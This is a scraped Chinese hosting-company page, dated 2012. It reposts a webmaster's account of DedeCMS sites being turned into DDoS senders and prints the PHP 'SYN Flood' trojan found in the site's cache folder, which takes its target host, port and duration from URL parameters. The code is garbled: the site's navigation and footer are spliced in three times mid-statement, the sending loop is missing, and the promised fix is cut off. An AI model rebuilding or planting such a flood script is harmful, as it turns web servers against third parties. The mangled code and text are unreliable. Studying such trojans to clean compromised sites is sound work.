到年底了，不知不觉过的太快了，最近俺的几个网站受到了机房的严重警告，让我意想不到的是，机房那面竟然说我的网站被挂马了，网站流量总是不断的往外发包，怎么也想不通，网站都稳定运行了好几年了，从没遇到过被挂马这一说，于是我整整工作了三天三夜终于把问题的根源找到了，也是本文的标题 “dedecms ddos挂马漏洞的解决办法”所要讲的。下面我给大家详细的介绍一下我的解决办法，希望遇到这种情况的站长童鞋们，遇到这种问题也能迎刃而解。

　　Dedecms是国内最有名的php开源系统，也是我用的最多的一个系统，简单实用稳定是我使用了多年的理由，正因为dedecms的开源，也导致了很多黑客盯上了这个程序，没日没夜的研究dedecms的漏洞，也就在最近终于爆发了，很多dedecms的网站都被挂马了，有的被机房警告，重的被机房强行关站，数不胜数。我想说的是既然问题出现了我们就要去解决，只有解决了，你的网站才会长期稳定发展下去。 首先从问题的特征跟大家一一介绍。

　　被挂马的特征：打开自己的网站首页，用查看源代码的方式会发现自己的网站被增加了许许多多的黑链代码，黑链代码是最简单也最能让站长们看出来的，他无非就是友情链接的代码。

　　再一个特征就是打开网站会被360安全提示网站存在挂马风险，这一类型的挂马代码，一般是框架代码或者是js代码或者是图片代码，还有个特征就是网站会突然打不开或者打开慢，检查流量会发现自己占用了许多流量，也就是说流量往外发包的特征，也叫UDP 流量发包攻击。以上就是dedecms被挂马的大体特征，下面就讲点实际的，网站被挂马的解决办法和预防措施。

　　首先把网站程序的代码下载到自己的本地，用sinesafe木马清除工具检测了一下，发现data/cache/目录下有许多脚本木马，打开木马脚本发现了一些不认识的PHP代码，把代码放到sinesafe木马工具里深度剖析了一下发现了木马特征，代码如下：

<?php

set_time_limit(984918);

$host =

网站建设|独享带宽服务器|优惠促销机型|付款方式|联系我们

快速业务通道 ++++选择通道++++ 国内服务器厦门电信服务器汕头电信服务器温州电信服务器厦门网通服务器汕头双线服务器美国服务器欧洲服务器美国KT机房服务器美国FDC机房服务器香港服务器新加坡服务器韩国服务器台湾服务器英国服务器德国服务器新加坡Qala机房服务器香港机房服务器法国服务器江苏电信服务器美国TB机房服务器日本服务器河北网通服务器厦门软二服务器台湾机房服务器韩国机房服务器美国ST机房服务器江西电信服务器其他机房服务器菲律宾服务器日本机房服务器菲律宾机房服务器 国内大带宽

• 首页
• 服务器租用
• 服务器托管
• 海外服务器
• 带宽租用
• 企业邮局
• 增值服务

• 欢迎光临凌众科技，我们将竭诚为您提供最优质的服务！业务电话：0592-5908028 技术支持电话：0592-5908020

• 厦门电信服务器
• 汕头电信服务器
• 厦门网通服务器
• 汕头双线服务器
• 江西电信服务器
• 百M独享服务器
• 国外服务器
• 香港服务器
• 美国服务器
• 其他机房

• 厦门电信托管
• 厦门网通托管
• 汕头电信托管
• 汕头双线托管

• 美国KT服务器
• 美国FDC服务器
• 美国TB服务器
• 美国ST服务器
• 欧洲服务器
• 香港服务器
• 台湾服务器
• 日本服务器
• 新加坡服务器
• 韩国服务器
• 菲律宾服务器

• 国内百独服务器
• 香港10M独享
• 美国不限流量服务器

• 欢迎光临凌众科技，我们将竭诚为您提供最优质的服务！业务电话：0592-5908028 技术支持电话：0592-5908020

• 欢迎光临凌众科技，我们将竭诚为您提供最优质的服务！业务电话：0592-5908028 技术支持电话：0592-5908020

• 首 页
• IDC资讯
• 网站运营
• 网赚联盟
• 程序设计
• Web编程
• 网页制作
• 数据库
• 软件技巧
• 服务器技术
• 操作系统
• 网络技术
• 脚本技术

技术文章 > 网站运营 > 网站推广 > 正文

文件 -1 text win2 服务 域名

分享dedecms DDOS挂马漏洞的解决方法 作者 佚名 来源 网络推广 浏览 发布时间 2012-02-10 content 凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢! 12下一页 分享到： 更多 你可能对下面的文章感兴趣 拖放式智能建站系统 造就个性网站实现高利润创收 Photoshop教程:简单制作3D图标 获取信息的有关Windows API JFrame，JDialog，JInternalFrame关闭的拦截 - 编程入门网 Photoshop实例教程:漂亮的淡蓝色图片 EMF介绍系列（四、枚举类型、自定义类型和Map） - 编程入门网 浅谈Java中的类型转换 - 编程入门网 Sun Solaris软件包管理 Flash游戏制作规划与流程漫谈(3) opensuse的邮件列表 上一篇: 医院网络营销如何有效提高转化率下一篇: 浅谈中小型企业网络营销现状及应对方法 关于分享dedecms DDOS挂马漏洞的解决方法的所有评论 昵称 评论内容

随机推荐 全球好IDC交流论坛 厦门服务器租用 香港服务器租用 美国服务器租用 163美丽网 流行发型大全 丝袜美腿诱惑 维权防骗网 相关文章 PS照片:色阶调整发灰照片 LINUX DHCP基本配置 用vbs实现防止计算机使用 LMHosts 文件 Win2003操作技巧 设置FreeBSD控制台分辨率的方法 linux系统架构，文件系统及简单命令 ASP实例教程:asp无限级显示分类代码 ZIP版本的Tomcat配置新手入门 - 编程入门网 企业JavaBeansTM技术介绍 - 编程入门网 [分享]关于linux中的YUM---yellow dog updater modifier(黄狗升级器?)的配置说明(补充)! Word入门动画教程49：选择性粘贴 全盘搜索指定文件并拷贝到指定位置[自动重命名]的批处理 javascript设计模式:方法的链式调用 CSS样式文件优化 更整洁而清晰 使用UML编写Java应用程序 - 编程入门网 Photoshop调色教程:红润肤色的美女 Linux下VIM编辑器的详细使用 Fireworks教程：真实的物体阴影效果 在ASP.NET页中检测浏览器类型 Java的历史 - 编程入门网

关于我们|联系我们|合作伙伴|工作机会|付款方式|网站地图

Copyright ©1999-2011 厦门凌众科技有限公司 厦门优通互联科技开发有限公司 All rights reserved

地址(ADD)：厦门软件园二期望海路63号701E（东南融通旁） 邮编(ZIP)：361008

电话：0592-5908028 传真：0592-5908039 咨询信箱：web@lingzhong.cn 咨询OICQ：173723134

《中华人民共和国增值电信业务经营许可证》闽B2-20100024  ICP备案:闽ICP备05037997号

GET['host'];

$port =

网站建设|独享带宽服务器|优惠促销机型|付款方式|联系我们

快速业务通道 ++++选择通道++++ 国内服务器厦门电信服务器汕头电信服务器温州电信服务器厦门网通服务器汕头双线服务器美国服务器欧洲服务器美国KT机房服务器美国FDC机房服务器香港服务器新加坡服务器韩国服务器台湾服务器英国服务器德国服务器新加坡Qala机房服务器香港机房服务器法国服务器江苏电信服务器美国TB机房服务器日本服务器河北网通服务器厦门软二服务器台湾机房服务器韩国机房服务器美国ST机房服务器江西电信服务器其他机房服务器菲律宾服务器日本机房服务器菲律宾机房服务器 国内大带宽

• 首页
• 服务器租用
• 服务器托管
• 海外服务器
• 带宽租用
• 企业邮局
• 增值服务

• 欢迎光临凌众科技，我们将竭诚为您提供最优质的服务！业务电话：0592-5908028 技术支持电话：0592-5908020

• 厦门电信服务器
• 汕头电信服务器
• 厦门网通服务器
• 汕头双线服务器
• 江西电信服务器
• 百M独享服务器
• 国外服务器
• 香港服务器
• 美国服务器
• 其他机房

• 厦门电信托管
• 厦门网通托管
• 汕头电信托管
• 汕头双线托管

• 美国KT服务器
• 美国FDC服务器
• 美国TB服务器
• 美国ST服务器
• 欧洲服务器
• 香港服务器
• 台湾服务器
• 日本服务器
• 新加坡服务器
• 韩国服务器
• 菲律宾服务器

• 国内百独服务器
• 香港10M独享
• 美国不限流量服务器

• 欢迎光临凌众科技，我们将竭诚为您提供最优质的服务！业务电话：0592-5908028 技术支持电话：0592-5908020

• 欢迎光临凌众科技，我们将竭诚为您提供最优质的服务！业务电话：0592-5908028 技术支持电话：0592-5908020

• 首 页
• IDC资讯
• 网站运营
• 网赚联盟
• 程序设计
• Web编程
• 网页制作
• 数据库
• 软件技巧
• 服务器技术
• 操作系统
• 网络技术
• 脚本技术

技术文章 > 网站运营 > 网站推广 > 正文

文件 -1 text win2 服务 域名

分享dedecms DDOS挂马漏洞的解决方法 作者 佚名 来源 网络推广 浏览 发布时间 2012-02-10 content 凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢! 12下一页 分享到： 更多 你可能对下面的文章感兴趣 拖放式智能建站系统 造就个性网站实现高利润创收 Photoshop教程:简单制作3D图标 获取信息的有关Windows API JFrame，JDialog，JInternalFrame关闭的拦截 - 编程入门网 Photoshop实例教程:漂亮的淡蓝色图片 EMF介绍系列（四、枚举类型、自定义类型和Map） - 编程入门网 浅谈Java中的类型转换 - 编程入门网 Sun Solaris软件包管理 Flash游戏制作规划与流程漫谈(3) opensuse的邮件列表 上一篇: 医院网络营销如何有效提高转化率下一篇: 浅谈中小型企业网络营销现状及应对方法 关于分享dedecms DDOS挂马漏洞的解决方法的所有评论 昵称 评论内容

随机推荐 全球好IDC交流论坛 厦门服务器租用 香港服务器租用 美国服务器租用 163美丽网 流行发型大全 丝袜美腿诱惑 维权防骗网 相关文章 PS照片:色阶调整发灰照片 LINUX DHCP基本配置 用vbs实现防止计算机使用 LMHosts 文件 Win2003操作技巧 设置FreeBSD控制台分辨率的方法 linux系统架构，文件系统及简单命令 ASP实例教程:asp无限级显示分类代码 ZIP版本的Tomcat配置新手入门 - 编程入门网 企业JavaBeansTM技术介绍 - 编程入门网 [分享]关于linux中的YUM---yellow dog updater modifier(黄狗升级器?)的配置说明(补充)! Word入门动画教程49：选择性粘贴 全盘搜索指定文件并拷贝到指定位置[自动重命名]的批处理 javascript设计模式:方法的链式调用 CSS样式文件优化 更整洁而清晰 使用UML编写Java应用程序 - 编程入门网 Photoshop调色教程:红润肤色的美女 Linux下VIM编辑器的详细使用 Fireworks教程：真实的物体阴影效果 在ASP.NET页中检测浏览器类型 Java的历史 - 编程入门网

关于我们|联系我们|合作伙伴|工作机会|付款方式|网站地图

Copyright ©1999-2011 厦门凌众科技有限公司 厦门优通互联科技开发有限公司 All rights reserved

地址(ADD)：厦门软件园二期望海路63号701E（东南融通旁） 邮编(ZIP)：361008

电话：0592-5908028 传真：0592-5908039 咨询信箱：web@lingzhong.cn 咨询OICQ：173723134

《中华人民共和国增值电信业务经营许可证》闽B2-20100024  ICP备案:闽ICP备05037997号

GET['port'];

$exec_time =

网站建设|独享带宽服务器|优惠促销机型|付款方式|联系我们

快速业务通道 ++++选择通道++++ 国内服务器厦门电信服务器汕头电信服务器温州电信服务器厦门网通服务器汕头双线服务器美国服务器欧洲服务器美国KT机房服务器美国FDC机房服务器香港服务器新加坡服务器韩国服务器台湾服务器英国服务器德国服务器新加坡Qala机房服务器香港机房服务器法国服务器江苏电信服务器美国TB机房服务器日本服务器河北网通服务器厦门软二服务器台湾机房服务器韩国机房服务器美国ST机房服务器江西电信服务器其他机房服务器菲律宾服务器日本机房服务器菲律宾机房服务器 国内大带宽

• 首页
• 服务器租用
• 服务器托管
• 海外服务器
• 带宽租用
• 企业邮局
• 增值服务

• 欢迎光临凌众科技，我们将竭诚为您提供最优质的服务！业务电话：0592-5908028 技术支持电话：0592-5908020

• 厦门电信服务器
• 汕头电信服务器
• 厦门网通服务器
• 汕头双线服务器
• 江西电信服务器
• 百M独享服务器
• 国外服务器
• 香港服务器
• 美国服务器
• 其他机房

• 厦门电信托管
• 厦门网通托管
• 汕头电信托管
• 汕头双线托管

• 美国KT服务器
• 美国FDC服务器
• 美国TB服务器
• 美国ST服务器
• 欧洲服务器
• 香港服务器
• 台湾服务器
• 日本服务器
• 新加坡服务器
• 韩国服务器
• 菲律宾服务器

• 国内百独服务器
• 香港10M独享
• 美国不限流量服务器

• 欢迎光临凌众科技，我们将竭诚为您提供最优质的服务！业务电话：0592-5908028 技术支持电话：0592-5908020

• 欢迎光临凌众科技，我们将竭诚为您提供最优质的服务！业务电话：0592-5908028 技术支持电话：0592-5908020

• 首 页
• IDC资讯
• 网站运营
• 网赚联盟
• 程序设计
• Web编程
• 网页制作
• 数据库
• 软件技巧
• 服务器技术
• 操作系统
• 网络技术
• 脚本技术

技术文章 > 网站运营 > 网站推广 > 正文

文件 -1 text win2 服务 域名

分享dedecms DDOS挂马漏洞的解决方法 作者 佚名 来源 网络推广 浏览 发布时间 2012-02-10 content 凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢! 12下一页 分享到： 更多 你可能对下面的文章感兴趣 拖放式智能建站系统 造就个性网站实现高利润创收 Photoshop教程:简单制作3D图标 获取信息的有关Windows API JFrame，JDialog，JInternalFrame关闭的拦截 - 编程入门网 Photoshop实例教程:漂亮的淡蓝色图片 EMF介绍系列（四、枚举类型、自定义类型和Map） - 编程入门网 浅谈Java中的类型转换 - 编程入门网 Sun Solaris软件包管理 Flash游戏制作规划与流程漫谈(3) opensuse的邮件列表 上一篇: 医院网络营销如何有效提高转化率下一篇: 浅谈中小型企业网络营销现状及应对方法 关于分享dedecms DDOS挂马漏洞的解决方法的所有评论 昵称 评论内容

随机推荐 全球好IDC交流论坛 厦门服务器租用 香港服务器租用 美国服务器租用 163美丽网 流行发型大全 丝袜美腿诱惑 维权防骗网 相关文章 PS照片:色阶调整发灰照片 LINUX DHCP基本配置 用vbs实现防止计算机使用 LMHosts 文件 Win2003操作技巧 设置FreeBSD控制台分辨率的方法 linux系统架构，文件系统及简单命令 ASP实例教程:asp无限级显示分类代码 ZIP版本的Tomcat配置新手入门 - 编程入门网 企业JavaBeansTM技术介绍 - 编程入门网 [分享]关于linux中的YUM---yellow dog updater modifier(黄狗升级器?)的配置说明(补充)! Word入门动画教程49：选择性粘贴 全盘搜索指定文件并拷贝到指定位置[自动重命名]的批处理 javascript设计模式:方法的链式调用 CSS样式文件优化 更整洁而清晰 使用UML编写Java应用程序 - 编程入门网 Photoshop调色教程:红润肤色的美女 Linux下VIM编辑器的详细使用 Fireworks教程：真实的物体阴影效果 在ASP.NET页中检测浏览器类型 Java的历史 - 编程入门网

关于我们|联系我们|合作伙伴|工作机会|付款方式|网站地图

Copyright ©1999-2011 厦门凌众科技有限公司 厦门优通互联科技开发有限公司 All rights reserved

地址(ADD)：厦门软件园二期望海路63号701E（东南融通旁） 邮编(ZIP)：361008

电话：0592-5908028 传真：0592-5908039 咨询信箱：web@lingzhong.cn 咨询OICQ：173723134

《中华人民共和国增值电信业务经营许可证》闽B2-20100024  ICP备案:闽ICP备05037997号

GET['time'];

$Sendlen = 65535;

$packets = 0;

}

echo "================================================<br>";

echo " <font color=blue>www.phpddos.com<br>";

echo " SYN Flood 模块<br>";

echo " 作者：ybhacker<br>";

echo " 警告：本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>";

echo "================================================<br><br>";

echo " 攻击包总数：<font color=Red><span class=\"text\">".$packets." 个数据包</span><br><br></font>";

echo " 攻击总流量：<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>";

echo " 攻击总字节：<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span><br><br></font>";

echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";

?>

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!